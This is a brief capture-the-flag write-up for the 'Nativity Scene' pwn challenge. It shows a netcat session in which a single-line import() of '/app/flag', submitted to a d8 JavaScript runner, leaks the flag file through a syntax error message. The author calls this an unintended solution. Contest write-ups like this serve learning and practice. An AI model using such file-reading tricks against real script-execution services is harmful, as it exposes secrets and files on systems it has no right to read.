Rating: 5.0

# Nativity Scene (pwn, 312+21 pts, 8 solved)

We can use `import` function to leak content of the flag file "/app/flag" as follows:
```
$ nc 35.246.66.119 1337
Solve PoW with: hashcash -mqb28 uuqmslhq
1:28:200510:uuqmslhq::HvH8Kkm9q+NTtm1D:000000005eIoq

******IMPORTANT******
Read the description on the website.
******IMPORTANT******

Please submit your exploit and then a line containing "EOF".
Your script will be written to a file and invoked via `/app/d8 --allow-natives-syntax input.js`

import("/app/flag");
EOF
/app/flag:1: SyntaxError: Unexpected token '{'
SaF{https://www.youtube.com/watch?v=bUx9yPS4ExY}
^
SyntaxError: Unexpected token '{'

```

The above does not depend on any _runtime functions_ that are enabled with `--allow-natives-syntax`, so I believe it is not the intended solution.

Original writeup (https://github.com/p4-team/ctf/tree/master/2020-05-10-spam-and-flags-teaser/nativity_scene).